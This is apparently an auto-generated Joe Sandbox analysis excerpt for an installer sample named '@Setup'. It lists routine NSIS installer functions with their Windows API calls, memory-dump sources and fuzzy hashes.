                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                    • GlobalFree.KERNEL32(00781108), ref: 00402387
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3376005127-0
                                                                                                                                                    • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                    • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                    • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                    • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                    • String ID: !
                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                    • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                    • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                    • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                    • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                                    • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                    • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                    • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                    • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                                                                    • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                    • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                    • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                    • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcatwsprintf
                                                                                                                                                    • String ID: %02x%c$...
                                                                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                                                                    • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                    • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                    • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                    • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                    APIs
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                                                                    • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                    • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                    • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
